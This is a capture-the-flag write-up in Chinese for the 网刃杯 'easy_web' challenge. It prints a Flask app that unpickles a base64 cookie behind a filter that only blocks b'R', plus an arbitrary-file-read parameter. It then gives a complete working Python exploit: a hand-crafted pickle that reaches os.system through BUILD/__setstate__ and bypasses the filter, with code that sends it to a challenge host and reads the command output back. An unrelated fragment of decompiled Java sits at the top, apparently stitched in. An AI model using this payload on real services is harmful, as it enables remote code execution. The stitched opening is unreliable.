        // is never closed (resource leak in the original, as decompiled).
        BufferedReader in = new BufferedReader(new InputStreamReader(new URL(arg8).openConnection().getInputStream()));
        StringBuilder content = new StringBuilder();
        while(true) {
            String inputLine = in.readLine();
            if(inputLine == null) {
                return content;
            }
            content.append(inputLine);
            content.append("\n");
        }
        return content; // unreachable after while(true) -- decompiler artifact
    }
}
樱桃猫写了自己的第一个flask网站,你能帮他看看有什么问题吗?
网刃杯的easy_web,原题
利用 ?pic= 参数的任意文件读取,先读 /proc/self/cmdline 得到启动命令,再读出源码 app.py:
app.py
import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file

app = Flask(__name__)


class User():
    # Plain data holder; the only class the pickle payload (exploit below) has to name.
    def __init__(self,name,age):
        self.name = name
        self.age = age


def check(s: bytes) -> int:
    """Deny-list "filter" on the raw pickle bytes.

    Returns 0 (block) if the stream contains b'R' -- the REDUCE opcode -- and 1
    (allow) otherwise.  Other ways to end up calling a function during
    unpickling (e.g. BUILD with an attacker-supplied __setstate__, which the
    exploit below uses) are not covered.
    """
    if b'R' in s:
        return 0
    return 1


@app.route("/")
def index() -> str:
    """Render index.html with a username taken from the `user` cookie and an image
    read from the `pic` query parameter."""
    try:
        # cookie -> base64 -> pickle.loads on attacker-controlled bytes: untrusted
        # deserialisation, i.e. remote code execution.
        user = base64.b64decode(request.cookies.get('user'))
        if check(user):
            user = pickle.loads(user)
            username = user["username"]
        else:
            username = "bad,bad,hacker"
    except:
        # Bare except: a missing cookie, bad base64, a failing unpickle or a
        # non-subscriptable result all silently fall back to "CTFer".
        username = "CTFer"
    pic = '{0}.jpg'.format(random.randint(1,7))
    try:
        # ?pic=<path> is opened as given -> arbitrary file read (used above for
        # /proc/self/cmdline, /proc/self/environ and later /tmp/1.txt).
        pic=request.args.get('pic')
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
        p = base64_data.decode()
    except:
        # Any read failure falls back to a random bundled image.
        pic='{0}.jpg'.format(random.randint(1,7))
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
        p = base64_data.decode()
    return render_template('index.html', uname=username, pic=p )


if __name__ == "__main__":
    app.run('0.0.0.0',port=8888)
读 /proc/self/environ 没用
MAIL=/var/mail/appUSER=appHOSTNAME=engine-1SHLVL=1PYTHON_PIP_VERSION=20.1HOME=/home/appGPG_KEY=E3FF2839C048B25C084DEBE9B26995E310250568LOGNAME=app_=/bin/suPYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/1fe530e9e3d800be94e04f6428460fc4fb94f5a9/get-pip.pyTERM=xtermPATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binLANG=C.UTF-8SHELL=/bin/shPYTHON_VERSION=3.8.2PWD=/appPYTHON_GET_PIP_SHA256=ce486cddac44e99496a702aa5c06c5028414ef48fdfd5242cd2fe559b13d4348
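import pickle
import base64

TARGET = "http://eci-2zecbk1aefg5marnfo77.cloudeci1.ichunqiu.com:8888/"
OUT_FILE = "/tmp/1.txt"  # command output goes here and is read back through ?pic=


def build_payload(cmd):
    """Return a pickle stream that runs `cmd` through os.system when unpickled.

    The app rejects any stream containing b'R' (REDUCE), so the call is made
    with BUILD instead: the first BUILD copies {"__setstate__": os.system} into
    the fresh User instance's __dict__ (User defines no __setstate__), the second
    BUILD finds that attribute and calls it with the command string.  Output is
    redirected to OUT_FILE because the page never shows the return value.
    `cmd` must not contain a newline -- it terminates the UNICODE (V) opcode.
    """
    return (
        b"c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV"
        + cmd.encode()
        + b" > " + OUT_FILE.encode() + b"\nb."
    )


def extract_images(html):
    """Yield the decoded bytes of every base64 data URI embedded in `html`.

    Mirrors the template's `<img src="data:...;base64,XXXX">` line: on every
    line mentioning 'base64' the first double-quoted attribute is split on ','
    and the tail is base64-decoded.
    """
    for line in html.split("\n"):
        if "base64" in line:
            yield base64.b64decode(line.split('"')[1].split(",")[1])


def run(cmd):
    """Send the payload cookie, then print OUT_FILE as served back via ?pic=."""
    import requests  # lazy: keeps the payload builders importable without requests

    payload = build_payload(cmd)
    response = requests.get(
        TARGET + "?pic=" + OUT_FILE,
        cookies=dict(user=base64.b64encode(payload).decode()),
        timeout=10,  # never hang forever on an unreachable challenge box
    )
    for blob in extract_images(response.content.decode()):
        print(blob.decode())


if __name__ == "__main__":
    # run("ls / -a")
    run("cat /flagggggggggggggaaa")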
flag{2e4af838-7d23-4b04-a77a-1519e8b14e8f}
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/166923.html